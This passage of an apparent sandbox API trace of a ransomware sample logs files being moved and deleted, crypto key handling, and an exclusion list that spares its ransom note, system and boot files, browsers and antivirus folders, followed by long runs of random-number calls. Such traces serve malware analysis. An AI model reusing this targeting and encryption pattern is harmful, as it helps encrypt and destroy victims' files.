Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" [0153.665] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.665] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB58.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb58.tmp")) returned 0xcb58 [0153.666] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB58.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb58.tmp"), dwFlags=0x1) returned 0 [0153.666] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB58.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb58.tmp")) returned 1 [0153.667] CryptDestroyKey (hKey=0x9ad178) returned 1 [0153.667] wcslen (_String="OK") returned 0x2 [0153.667] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.667] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.667] CryptDestroyKey (hKey=0x9ad778) returned 1 [0153.667] CryptDestroyHash (hHash=0x9ad238) returned 1 [0153.667] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0153.667] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*NMCRYPT") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.exe") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.dll") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.lnk") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.bat") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.ini") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.msi") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*.scf") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*AppData*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\java\\*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\windows\\*") returned 0 [0153.667] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*Atheros*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*Realtek*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*bootmgr*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*boot*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*boot*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*IO.SYS*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*ntldr*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*chrome*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*opera*") returned 0 [0153.668] PathMatchSpecW (pszFile="TipTsf.dll.mui", pszSpec="*firefox*") returned 0 [0153.668] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", pszSpec="*") returned 1 [0153.668] strlen (_Str="NMoreira") returned 0x8 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom 